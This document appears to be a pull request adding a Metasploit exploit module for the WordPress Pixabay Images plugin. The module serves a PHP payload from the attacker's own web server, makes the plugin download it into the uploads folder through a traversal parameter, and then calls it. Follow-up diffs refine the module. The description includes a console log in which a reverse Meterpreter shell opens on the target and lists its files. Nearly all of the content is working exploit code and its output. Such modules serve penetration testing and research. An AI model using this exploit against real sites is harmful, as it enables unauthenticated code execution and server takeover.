### PR TITLE
Wordpress Pixabay Images vulnerability

### DIFF
--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -1,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Pixabay Images PHP Code Upload',
+      'Description'    => %q{
+          This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay
+          Images 2.3.6. The plugin does not check the host of a provided download URL
+          which can be used to store and execute malicious PHP code on the system.
+      },
+
+      'Author'	=>
+        [
+          'h0ng10', # Discovery, Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['pixabay-images 2.3', {}]],
+      'DefaultTarget'  => 0,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'DisclosureDate' => 'Jan 19 2015'
+      ))
+
+      register_options(
+        [
+          OptString.new('DOWNURI', [ false,  "An alternative URI to request the PHP payload from"]),
+        ], self.class)
+
+  end
+
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+      vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}")
+      print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+      send_response(cli, payload.encoded)
+  end
+
+  def generate_payload_uri
+
+      # Did the user provide his own url? If yes use it...
+      return datastore['DOWNURI'] if datastore['DOWNURI']
+
+      # Create a custom URI
+      custom_uri = "http://" + datastore['SRVHOST']
+
+      if datastore['SRVPORT'] != "80" then
+          custom_uri += ":" + datastore['SRVPORT'].to_s
+      end
+
+      custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
+      return custom_uri
+  end
+
+
+  def call_payload(file_name, epoch_time)
+      real_fn = "#{file_name}_#{epoch_time.to_s}.php"
+      res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
+          })
+      return res
+  end
+
+  def exploit
+    unless wordpress_and_online?
+      fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
+    end
+
+
+    print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+    start_service
+
+    # did the user provide his own url
+    payload_uri = generate_payload_uri
+    vprint_status("Using URI " + payload_uri)
+
+    random_file_name = rand_text_alphanumeric(rand(5)+5)
+    post = {
+        'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+        'image_url' => payload_uri,
+        'image_user' => rand_text_alphanumeric(rand(5)+5),
+        'q' => "../../../../" + random_file_name
+    }
+
+    res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+        'vars_post' => post,
+        })
+
+    server_epoch_time = DateTime.strptime(res.headers['date'], "%a, %d %b %Y %H:%M:%S GMT").to_i
+
+    print_status("Calling payload")
+    res = call_payload(random_file_name, server_epoch_time)
+
+    if (res and res.code != 200) then
+        print_status("Request failed, trying additional epoch values...")
+        server_epoch_time -= 5
+        10.times do |i|
+            res = call_payload(random_file_name, server_epoch_time)
+            break if res and res.code == 200
+            server_epoch_time += 1
+        end
+    end
+    stop_service
+
+  end
+
+  def check
+    res = wordpress_and_online?
+    unless res
+      vprint_error("#{peer} does not seeem to be Wordpress site")
+      return Exploit::CheckCode::Unknown
+    end
+
+    # Send a request with a illegal URL to verify that the target is vulnerable
+    post = {
+        'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+        'image_url' => rand_text_alphanumeric(rand(5)+5),
+        'image_user' => rand_text_alphanumeric(rand(5)+5),
+        'q' => rand_text_alphanumeric(rand(5)+5)
+    }
+
+    res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+        'vars_post' => post,
+        })
+
+
+    if res.body and (res.body =~ /Error: A valid URL was not provided/)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+
+  end
+end

--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -62,13 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return datastore['DOWNURI'] if datastore['DOWNURI']
 
       # Create a custom URI
-      custom_uri = "http://" + datastore['SRVHOST']
-
-      if datastore['SRVPORT'] != "80" then
-          custom_uri += ":" + datastore['SRVPORT'].to_s
-      end
-
-      custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
+      custom_uri = get_uri + ".php"
       return custom_uri
   end
 
@@ -77,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
       real_fn = "#{file_name}_#{epoch_time.to_s}.php"
       res = send_request_cgi({
           'method' => 'GET',
-          'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
+          'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
           })
       return res
   end
@@ -87,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
     end
 
-
-    print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+    print_status("Starting up web service...")
     start_service
 
     # did the user provide his own url
@@ -105,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi({
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+        'uri' => normalize_uri(wordpress_url_backend),
         'vars_post' => post,
         })
 
@@ -144,12 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi({
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+        'uri' => normalize_uri(wordpress_url_backend),
         'vars_post' => post,
         })
 
 
-    if res.body and (res.body =~ /Error: A valid URL was not provided/)
+    if res and (res.body =~ /Error: A valid URL was not provided/)
       return Exploit::CheckCode::Vulnerable
     end
 

--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -27,7 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ]
+          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ],
+          [ 'OSVDB', '117145' ],
+          [ 'OSVDB', '117146'],
+          [ 'WPVDB', '7758']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],

--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -43,6 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
       register_options(
         [
+        OptInt.new('RETRIES', [ false, 'Number of guesses if initial name guess fails', 5]),
           OptString.new('DOWNURI', [ false,  "An alternative URI to request the PHP payload from"]),
         ], self.class)
 
@@ -109,8 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if (res and res.code != 200) then
         print_status("Request failed, trying additional epoch values...")
-        server_epoch_time -= 5
-        10.times do |i|
+        datastore['RETRIES'].times do |i|
             res = call_payload(random_file_name, server_epoch_time)
             break if res and res.code == 200
             server_epoch_time += 1


### PR DESCRIPTION
This module exploits several vulnerability in the Wordpress Plugin "Pixabay Images" to upload a PHP file to the remote system. By abusing this vulnerability a unauthenticated user can execute arbitrary code on the target.

Tested on Debian 7 / Wordpress 4.1/ Pixabay Images 2.3

```
msf > use exploit/unix/webapp/php_wordpress_pixabay_images
msf exploit(php_wordpress_pixabay_images) > set SRVHOST 192.168.80.22
SRVHOST => 192.168.80.22
msf exploit(php_wordpress_pixabay_images) > set LHOST 192.168.80.22
LHOST => 192.168.80.22
msf exploit(php_wordpress_pixabay_images) > set RHOST 192.168.80.53
RHOST => 192.168.80.53
msf exploit(php_wordpress_pixabay_images) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.80.22:4444
msf exploit(php_wordpress_pixabay_images) > [*] Starting up web service on http://192.168.80.22:8080...
[*] Using URL: http://192.168.25.80:8080/tuD3m1
[*] 192.168.80.53    php_wordpress_pixabay_images - 192.168.80.53:80 - Sending the payload to the server...
[*] Calling payload
[*] Sending stage (40499 bytes) to 192.168.80.53
[*] Meterpreter session 1 opened (192.168.80.22:4444 -> 192.168.80.53:59916) at 2015-01-19 17:42:30 +0100

[*] Server stopped.

msf exploit(php_wordpress_pixabay_images) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: /var/www/wp-content/uploads
====================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  1316  fil   2015-01-15 05:08:45 +0100  17qf3DMs_1421294925.php
40755/rwxr-xr-x   4096  dir   2015-01-14 11:23:02 +0100  2015

meterpreter >
```
